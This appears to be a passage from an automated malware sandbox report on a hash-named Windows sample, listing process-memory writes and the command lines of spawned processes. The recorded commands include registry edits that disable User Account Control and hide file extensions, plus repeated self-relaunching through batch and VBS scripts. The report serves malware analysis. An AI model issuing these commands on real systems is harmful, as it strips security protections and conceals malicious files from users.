N/A N/A C:\Users\Admin\lKwcEkEY\gwooEwMc.exe N/A
N/A N/A C:\Users\Admin\lKwcEkEY\gwooEwMc.exe N/A
N/A N/A C:\Users\Admin\lKwcEkEY\gwooEwMc.exe N/A
N/A N/A C:\Users\Admin\lKwcEkEY\gwooEwMc.exe N/A
N/A N/A C:\Users\Admin\lKwcEkEY\gwooEwMc.exe N/A
N/A N/A C:\Users\Admin\lKwcEkEY\gwooEwMc.exe N/A
N/A N/A C:\Users\Admin\lKwcEkEY\gwooEwMc.exe N/A
N/A N/A C:\Users\Admin\lKwcEkEY\gwooEwMc.exe N/A
N/A N/A C:\Users\Admin\lKwcEkEY\gwooEwMc.exe N/A
N/A N/A C:\Users\Admin\lKwcEkEY\gwooEwMc.exe N/A
N/A N/A C:\Users\Admin\lKwcEkEY\gwooEwMc.exe N/A
N/A N/A C:\Users\Admin\lKwcEkEY\gwooEwMc.exe N/A
N/A N/A C:\Users\Admin\lKwcEkEY\gwooEwMc.exe N/A
N/A N/A C:\Users\Admin\lKwcEkEY\gwooEwMc.exe N/A
N/A N/A C:\Users\Admin\lKwcEkEY\gwooEwMc.exe N/A
N/A N/A C:\Users\Admin\lKwcEkEY\gwooEwMc.exe N/A
N/A N/A C:\Users\Admin\lKwcEkEY\gwooEwMc.exe N/A
N/A N/A C:\Users\Admin\lKwcEkEY\gwooEwMc.exe N/A
N/A N/A C:\Users\Admin\lKwcEkEY\gwooEwMc.exe N/A
N/A N/A C:\Users\Admin\lKwcEkEY\gwooEwMc.exe N/A
N/A N/A C:\Users\Admin\lKwcEkEY\gwooEwMc.exe N/A
N/A N/A C:\Users\Admin\lKwcEkEY\gwooEwMc.exe N/A
N/A N/A C:\Users\Admin\lKwcEkEY\gwooEwMc.exe N/A
N/A N/A C:\Users\Admin\lKwcEkEY\gwooEwMc.exe N/A
N/A N/A C:\Users\Admin\lKwcEkEY\gwooEwMc.exe N/A
N/A N/A C:\Users\Admin\lKwcEkEY\gwooEwMc.exe N/A
N/A N/A C:\Users\Admin\lKwcEkEY\gwooEwMc.exe N/A
N/A N/A C:\Users\Admin\lKwcEkEY\gwooEwMc.exe N/A
N/A N/A C:\Users\Admin\lKwcEkEY\gwooEwMc.exe N/A
N/A N/A C:\Users\Admin\lKwcEkEY\gwooEwMc.exe N/A
N/A N/A C:\Users\Admin\lKwcEkEY\gwooEwMc.exe N/A
N/A N/A C:\Users\Admin\lKwcEkEY\gwooEwMc.exe N/A
N/A N/A C:\Users\Admin\lKwcEkEY\gwooEwMc.exe N/A
N/A N/A C:\Users\Admin\lKwcEkEY\gwooEwMc.exe N/A
N/A N/A C:\Users\Admin\lKwcEkEY\gwooEwMc.exe N/A
N/A N/A C:\Users\Admin\lKwcEkEY\gwooEwMc.exe N/A
N/A N/A C:\Users\Admin\lKwcEkEY\gwooEwMc.exe N/A
N/A N/A C:\Users\Admin\lKwcEkEY\gwooEwMc.exe N/A
N/A N/A C:\Users\Admin\lKwcEkEY\gwooEwMc.exe N/A
N/A N/A C:\Users\Admin\lKwcEkEY\gwooEwMc.exe N/A
N/A N/A C:\Users\Admin\lKwcEkEY\gwooEwMc.exe N/A
N/A N/A C:\Users\Admin\lKwcEkEY\gwooEwMc.exe N/A
N/A N/A C:\Users\Admin\lKwcEkEY\gwooEwMc.exe N/A
N/A N/A C:\Users\Admin\lKwcEkEY\gwooEwMc.exe N/A
N/A N/A C:\Users\Admin\lKwcEkEY\gwooEwMc.exe N/A
N/A N/A C:\Users\Admin\lKwcEkEY\gwooEwMc.exe N/A
N/A N/A C:\Users\Admin\lKwcEkEY\gwooEwMc.exe N/A
N/A N/A C:\Users\Admin\lKwcEkEY\gwooEwMc.exe N/A
N/A N/A C:\Users\Admin\lKwcEkEY\gwooEwMc.exe N/A
N/A N/A C:\Users\Admin\lKwcEkEY\gwooEwMc.exe N/A
N/A N/A C:\Users\Admin\lKwcEkEY\gwooEwMc.exe N/A
N/A N/A C:\Users\Admin\lKwcEkEY\gwooEwMc.exe N/A
N/A N/A C:\Users\Admin\lKwcEkEY\gwooEwMc.exe N/A
N/A N/A C:\Users\Admin\lKwcEkEY\gwooEwMc.exe N/A
N/A N/A C:\Users\Admin\lKwcEkEY\gwooEwMc.exe N/A
N/A N/A C:\Users\Admin\lKwcEkEY\gwooEwMc.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4560 wrote to memory of 4520 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Users\Admin\lKwcEkEY\gwooEwMc.exe
PID 4560 wrote to memory of 4520 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Users\Admin\lKwcEkEY\gwooEwMc.exe
PID 4560 wrote to memory of 4520 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Users\Admin\lKwcEkEY\gwooEwMc.exe
PID 4560 wrote to memory of 3240 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\ProgramData\xGYksgIk\mucsYUUU.exe
PID 4560 wrote to memory of 3240 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\ProgramData\xGYksgIk\mucsYUUU.exe
PID 4560 wrote to memory of 3240 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\ProgramData\xGYksgIk\mucsYUUU.exe
PID 4560 wrote to memory of 3732 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\cmd.exe
PID 4560 wrote to memory of 3732 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\cmd.exe
PID 4560 wrote to memory of 3732 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\cmd.exe
PID 4560 wrote to memory of 904 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\reg.exe
PID 4560 wrote to memory of 904 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\reg.exe
PID 4560 wrote to memory of 904 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\reg.exe
PID 4560 wrote to memory of 1232 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\reg.exe
PID 4560 wrote to memory of 1232 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\reg.exe
PID 4560 wrote to memory of 1232 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\reg.exe
PID 4560 wrote to memory of 4824 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\reg.exe
PID 4560 wrote to memory of 4824 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\reg.exe
PID 4560 wrote to memory of 4824 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\reg.exe
PID 4560 wrote to memory of 2356 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\cmd.exe
PID 4560 wrote to memory of 2356 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\cmd.exe
PID 4560 wrote to memory of 2356 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\cmd.exe
PID 3732 wrote to memory of 1612 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe
PID 3732 wrote to memory of 1612 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe
PID 3732 wrote to memory of 1612 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe
PID 2356 wrote to memory of 3224 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cscript.exe
PID 2356 wrote to memory of 3224 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cscript.exe
PID 2356 wrote to memory of 3224 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cscript.exe
PID 1612 wrote to memory of 5024 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\cmd.exe
PID 1612 wrote to memory of 5024 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\cmd.exe
PID 1612 wrote to memory of 5024 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\cmd.exe
PID 5024 wrote to memory of 4760 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe
PID 5024 wrote to memory of 4760 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe
PID 5024 wrote to memory of 4760 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe
PID 1612 wrote to memory of 4636 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\reg.exe
PID 1612 wrote to memory of 4636 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\reg.exe
PID 1612 wrote to memory of 4636 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\reg.exe
PID 1612 wrote to memory of 1436 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\reg.exe
PID 1612 wrote to memory of 1436 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\reg.exe
PID 1612 wrote to memory of 1436 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\reg.exe
PID 1612 wrote to memory of 1788 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\reg.exe
PID 1612 wrote to memory of 1788 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\reg.exe
PID 1612 wrote to memory of 1788 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\reg.exe
PID 1612 wrote to memory of 2676 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\cmd.exe
PID 1612 wrote to memory of 2676 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\cmd.exe
PID 1612 wrote to memory of 2676 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\cmd.exe
PID 2676 wrote to memory of 1628 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cscript.exe
PID 2676 wrote to memory of 1628 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cscript.exe
PID 2676 wrote to memory of 1628 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cscript.exe
PID 4760 wrote to memory of 1172 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\cmd.exe
PID 4760 wrote to memory of 1172 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\cmd.exe
PID 4760 wrote to memory of 1172 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\cmd.exe
PID 1172 wrote to memory of 1700 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe
PID 1172 wrote to memory of 1700 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe
PID 1172 wrote to memory of 1700 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe
PID 4760 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\reg.exe
PID 4760 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\reg.exe
PID 4760 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\reg.exe
PID 4760 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\reg.exe
PID 4760 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\reg.exe
PID 4760 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\reg.exe
PID 4760 wrote to memory of 3660 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\reg.exe
PID 4760 wrote to memory of 3660 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\reg.exe
PID 4760 wrote to memory of 3660 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\reg.exe
PID 4760 wrote to memory of 548 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\cmd.exe

Processes

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

"C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe"

C:\Users\Admin\lKwcEkEY\gwooEwMc.exe

"C:\Users\Admin\lKwcEkEY\gwooEwMc.exe"

C:\ProgramData\xGYksgIk\mucsYUUU.exe

"C:\ProgramData\xGYksgIk\mucsYUUU.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tWIgoUsg.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dOIwMQgI.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\xckEkAsg.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\MWYcUIks.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\aeYYYwEE.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\gCckkUwc.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tgwoAYIQ.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HIIQIwMQ.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\SysWOW64\cscript.exe

